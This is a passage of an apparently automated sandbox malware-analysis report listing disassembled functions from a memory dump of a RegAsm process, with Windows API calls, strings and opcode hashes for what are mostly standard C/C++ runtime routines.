Function 0041465E Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00412A47,?,20001004,00000000,00000002,?,?,00412049), ref: 00414692

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction ID: f9bd5592f4a27906ba0b7000611c056f456b6c13901b9127fc06cc884ae94f8f
Opcode Fuzzy Hash: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction Fuzzy Hash: 63E04F31540268BBCF122F61DC04EEE3F19FF85761F064026FC1566261CB7A9D61AA9D

Function 00407C63 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007C6F,00407287), ref: 00407C68

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 91f082824127807ca67e9bea16e4e1142dcaa675fdc02378074aa91e014118a9
Instruction ID: 0ff61591fe6e7fdbf664e27eab8a47433d3f920744837751a1e33914f5cec1be
Opcode Fuzzy Hash: 91f082824127807ca67e9bea16e4e1142dcaa675fdc02378074aa91e014118a9
Instruction Fuzzy Hash:

Function 0041EFD8 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0041EFD8

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction ID: d5d072ba9748c195f736b78e16f2f5f2af1f06de213b616d404cea10f9c51eb0
Opcode Fuzzy Hash: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction Fuzzy Hash: 01A02230300280CF83808F32AE0CB0C3FF8AE082E0B0AC03AA000C80B0EF3080A0AF08

Function 00404B20 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404B4C
std::_Lockit::_Lockit.LIBCPMT ref: 00404B69
std::_Lockit::~_Lockit.LIBCPMT ref: 00404B8D
std::_Lockit::~_Lockit.LIBCPMT ref: 00404BB8
std::_Lockit::_Lockit.LIBCPMT ref: 00404C2A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00404C7F
__Getctype.LIBCPMT ref: 00404C96
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404CD6
std::_Lockit::~_Lockit.LIBCPMT ref: 00404D78
std::_Facet_Register.LIBCPMT ref: 00404D7E

Strings

bad locale name, xrefs: 00404D98

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 103145292-1405518554
Opcode ID: 07779c633be37db408639f77928584da0fe84fd984f841e2fd8ba1ab6a6bcfd4
Instruction ID: c45789c66640c356b2bc41b45c406846e681c44b1f4b151baf81fb86c109fe15
Opcode Fuzzy Hash: 07779c633be37db408639f77928584da0fe84fd984f841e2fd8ba1ab6a6bcfd4
Instruction Fuzzy Hash: 7B619FB19043408BD720DF65D941B5BB7F4AFD4304F05493EE989A7392E738E948CB5A

Function 0040A998 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0040AAB7
___TypeMatch.LIBVCRUNTIME ref: 0040ABC5
_UnwindNestedFrames.LIBCMT ref: 0040AD17
CallUnexpected.LIBVCRUNTIME ref: 0040AD32

Strings

hqB, xrefs: 0040AAAE
csm, xrefs: 0040A9D5
csm, xrefs: 0040AA42
csm, xrefs: 0040AAEE

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$hqB
API String ID: 2751267872-961717235
Opcode ID: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
Instruction ID: 1a84720c735a061b690d6f447b3278b908e1dcb1436106e9bb87ee9a1a6810cd
Opcode Fuzzy Hash: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
Instruction Fuzzy Hash: 2DB18A718003099FDF14DFA5C9809AEBBB5FF14304B19456BE8017B282C739DA61CF9A

Function 00422D42 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042485F), ref: 00422D5B

Strings

sqrt, xrefs: 00422E9A
exp, xrefs: 00422DDA, 00422E3F
pow, xrefs: 00422DF9, 00422EA3, 00422EF0
asin, xrefs: 00422E88
log10, xrefs: 00422D9D, 00422DAC
acos, xrefs: 00422E91
log, xrefs: 00422DB8, 00422DC7

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
Instruction ID: 541d14d2076966b173cd57405107be29c5c83d47e8039af315078564b0fddfcc
Opcode Fuzzy Hash: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
Instruction Fuzzy Hash: 76514371B0062AEBCB108F59FA4C1AEBBB0FB45304F924057D480A6354CBBD8925EB5E

Function 0040718A Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407190
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0040719E
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004071AF
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004071C0

Strings

GetTempPath2W, xrefs: 004071B5
GetCurrentPackageId, xrefs: 00407198
kernel32.dll, xrefs: 0040718B
GetSystemTimePreciseAsFileTime, xrefs: 004071A4

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction ID: 3afd18a413fbafaec0d1884410ec314f69904bb85606d66d63126fe90f125993
Opcode Fuzzy Hash: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction Fuzzy Hash: 3CE0EC71749671AB83209F70BC0EDAA3AA4EE0971139205B2BD15D2361D6BC44559B9C

Function 00424323 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00B3CAE0,00B3CAE0,?,7FFFFFFF,?,004245F3,00B3CAE0,00B3CAE0,?,00B3CAE0,?,?,?,?,00B3CAE0,?), ref: 004243C9
__alloca_probe_16.LIBCMT ref: 00424484
__alloca_probe_16.LIBCMT ref: 00424513
__freea.LIBCMT ref: 0042455E
__freea.LIBCMT ref: 00424564
__freea.LIBCMT ref: 0042459A
__freea.LIBCMT ref: 004245A0
__freea.LIBCMT ref: 004245B0

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 8a56644c9f658ced4a7fecf9f58cf2b799a0c4498a4b3962048a55bd8390d3ba
Instruction ID: b3b1fd3be87dc675253da9249cad55eb0a70a834b65d1a532299ad71412a1fff
Opcode Fuzzy Hash: 8a56644c9f658ced4a7fecf9f58cf2b799a0c4498a4b3962048a55bd8390d3ba
Instruction Fuzzy Hash: 24711872B00625ABDF20AE64AC41BAF77B5DFC5314F94005BEA44A7381D73CDC8187A9

Function 00414301 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,8EB04C20,?,0041440E,004038E3,?,?,00000000), ref: 004143C2

Strings

api-ms-, xrefs: 00414358
ext-ms-, xrefs: 0041436C

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction ID: 9d281342414512710d521e2bc5e8bd8d189b06f0c9bb1d1e4d3acc3ca9f27be4
Opcode Fuzzy Hash: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction Fuzzy Hash: 9E21F371B41219ABCB219B61AC41F9B77589F817B4F250222ED26A73C0D738ED42C6D8

Function 00422232 Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
Instruction ID: 9d2747a7e5b70225cc448f1b3832819408a251e63c6cb1e4317f51345b07cf5e
Opcode Fuzzy Hash: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
Instruction Fuzzy Hash: B9B1E870B00215BFDB11DF59D980BAE7BB1BF45304F94816AE401AB392C7B99D42CB69

Function 0040A62A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040A621,00408D5A,00407CB3), ref: 0040A638
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040A646
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040A65F
SetLastError.KERNEL32(00000000,0040A621,00408D5A,00407CB3), ref: 0040A6B1

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
Instruction ID: 78011c5e5d228000ed262031febe4d72c2c7c60d5ad4d387ad9a5ce747099190
Opcode Fuzzy Hash: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
Instruction Fuzzy Hash: 530128332093112ED62427B6BD45A5B2678DB51774738063FF510722F1EF7E5C11554D

Function 004114C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8EB04C20,?,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 004114FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041150F
FreeLibrary.KERNEL32(00000000,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 00411531

Strings

mscoree.dll, xrefs: 004114F6
CorExitProcess, xrefs: 00411507

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
Instruction ID: 91ec29eb5be505712193f20e889ba6035279a869843729da5c2c1c8d1a6e38dc
Opcode Fuzzy Hash: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
Instruction Fuzzy Hash: 5E018431A50625EBDB218F50DC09BAEB7F9FB44B11F400526F912A22A0DB789900CA58

Function 00418EB1 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00418F38
__alloca_probe_16.LIBCMT ref: 00418FF9
__freea.LIBCMT ref: 00419060

Part of subcall function 00415426: HeapAlloc.KERNEL32(00000000,?,?,?,00407448,?,?,004038E3,0000000C), ref: 00415458

__freea.LIBCMT ref: 00419075
__freea.LIBCMT ref: 00419085

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: b34ec7378ed80fdedf5b3cd9fd74b686b7ca20f323847e8b562edae9002d46d2
Instruction ID: 5a58541e407446bb28ced3c61191459bbd43b91e1c19ac61a4b7f941500e9d67
Opcode Fuzzy Hash: b34ec7378ed80fdedf5b3cd9fd74b686b7ca20f323847e8b562edae9002d46d2
Instruction Fuzzy Hash: 1451E572600206AFDB249E65CC81EFB3AA9EF48754B15012EFD05D7250EB39DD81C7A9

Function 00405A29 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405A30
std::_Lockit::_Lockit.LIBCPMT ref: 00405A3A

Part of subcall function 00401980: std::_Lockit::_Lockit.LIBCPMT ref: 0040199C
Part of subcall function 00401980: std::_Lockit::~_Lockit.LIBCPMT ref: 004019B9

codecvt.LIBCPMT ref: 00405A74
std::_Facet_Register.LIBCPMT ref: 00405A8B
std::_Lockit::~_Lockit.LIBCPMT ref: 00405AAB

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 08d409ab8f65cfa251cbcb9404e233e286c333acaa76841f7ef905a91d8db047
Instruction ID: b96a9e16e5313ba5d76a5da041c455aafda494eca7322fa8897946df384a052d
Opcode Fuzzy Hash: 08d409ab8f65cfa251cbcb9404e233e286c333acaa76841f7ef905a91d8db047
Instruction Fuzzy Hash: 7C01AD75A00A168BCB05EB65C881AAF7771EF84354F24052EE414BB3D2CB3CAE058F99

Function 00401F00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408090: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407FAB,?,?,?,?,00407FAB,0000000C,00432FA4,0000000C), ref: 004080F0

Strings

ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80
ios_base::failbit set, xrefs: 00401E62, 00401F41
ios_base::eofbit set, xrefs: 00401F46

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 6db5754c0c3f7c630e456a44fc8a01ec81c9786fca09fcb0a19a2d9224875447
Instruction ID: 39c8128b798e2086e3302e8ab46e2dce8cada1f1b911e2d41b88b79c7a5bec65
Opcode Fuzzy Hash: 6db5754c0c3f7c630e456a44fc8a01ec81c9786fca09fcb0a19a2d9224875447
Instruction Fuzzy Hash: BD1136B29107156BC710DF68D801B86B3E8AF08310F14853FFA54E7291F778E804CBA9

Function 00407420 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407DA8
___raise_securityfailure.LIBCMT ref: 00407E90

Strings

@SC, xrefs: 00407E8B
#7@, xrefs: 00407E13

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: #7@$@SC
API String ID: 3761405300-54278199
Opcode ID: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
Instruction ID: 0d92a2c854cdd6e88b4d1eeb56e5bf4da0bfe8ec24aca00867b110679a0b03e4
Opcode Fuzzy Hash: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
Instruction Fuzzy Hash: DA2107B4640A00DBD318CF15F9857943BF4BB68355FA0643AE9088B3B1D3B46485CF1E

Function 0040B772 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx), ref: 0040B77F
GetLastError.KERNEL32(?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx,00000000,?,0040B67D), ref: 0040B789
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0040A593), ref: 0040B7B1

Strings

api-ms-, xrefs: 0040B796

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction ID: 4a96934300341e5ece3864587fe3feae18b3ac400cb1fe2ce3454729e361f76d
Opcode Fuzzy Hash: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction Fuzzy Hash: 29E01A30384208BBEF205B61EC06F5A3E64EB40B85F904031FB0DE91E1E775A9519ACC

Function 004164C2 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(8EB04C20,00000000,00000000,0040BDB8), ref: 00416525

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00416780
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004167C8
GetLastError.KERNEL32 ref: 0041686B

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
Instruction ID: 1bb8143dd65314e62236f50c93da9e0a6d801424c5e2e01ca8c3ea5794d6433d
Opcode Fuzzy Hash: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
Instruction Fuzzy Hash: 7DD158B5E002589FCB11DFA9D880AEDBBB5FF48304F19412AE856E7351D734E882CB58

Function 0040A741 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0040A808
___AdjustPointer.LIBCMT ref: 0040A82B
___AdjustPointer.LIBCMT ref: 0040A8C7

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction ID: 639cff4bd66d4eed68713a8ae307c2d2d1180f9e9004782a502f2a6fa8fea26a
Opcode Fuzzy Hash: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction Fuzzy Hash: 3D51CF72A00302AFEB29AF52C941B7A73A4EF40304F14853FE805672D1D739EC62C79A

Function 0041B4A7 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

GetLastError.KERNEL32 ref: 0041B50B
__dosmaperr.LIBCMT ref: 0041B512
GetLastError.KERNEL32(?,?,?,?), ref: 0041B54C
__dosmaperr.LIBCMT ref: 0041B553

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction ID: cec987ca27f54d0df3a57789ab5f391b1316bc0051da666ab1eca3c5aeea150a
Opcode Fuzzy Hash: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction Fuzzy Hash: 3221B671600215BFDB20EF66C8418ABB7ADFF043A8710852FF85997251D779ED9087D4

Function 004108A2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction ID: f8db4804455f599fb5fabd8b5f86bcd1d132503182311fbe19c9dedc91394c0d
Opcode Fuzzy Hash: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction Fuzzy Hash: 8F21F9B1610205AFEB20AF62CC90DAB776CFF40368710452BF415D7252D7B9EDD097A8

Function 0041C43D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041C445

Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C47D
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C49D

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction ID: cd346ceb72f841712861b774b6322b7d2f9c84398f992d5f92ec2fcb375f728e
Opcode Fuzzy Hash: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction Fuzzy Hash: 091104B2A48515BF672127B25CDACFF6D5CDE99398310402AF802D2102EE2CDD8285BD

Function 004241E7 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000), ref: 004241FE
GetLastError.KERNEL32(?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8,0040BDB8,?,00416E7D,?), ref: 0042420A

Part of subcall function 004241D0: CloseHandle.KERNEL32(FFFFFFFE,0042421A,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8,0040BDB8), ref: 004241E0

___initconout.LIBCMT ref: 0042421A

Part of subcall function 00424192: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004241C1,00421C31,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8), ref: 004241A5

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8), ref: 0042422F

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction ID: 4f4531f6176a0c5b6c9a7a905856594723a902087f3f8d784f297790ae8fc46e
Opcode Fuzzy Hash: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
Instruction Fuzzy Hash: C1F03736200124BBCF222FD5FC0899A7F26FB853B0F414065FA5995130C6319870AB99

Function 004102AD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0041033D

Strings

pow, xrefs: 00410315, 00410332

Memory Dump Source

Source File: 00000010.00000002.2056471740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
Instruction ID: ba283ab10e86f0ff01337ebee0106e11519cd21400a500e12903ed81b54b832b
Opcode Fuzzy Hash: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
Instruction Fuzzy Hash: CD517EB1A4A6068BCB117714DA413EB37A09B40701F604D6BE8D5413E9EB7D8CF69A4F

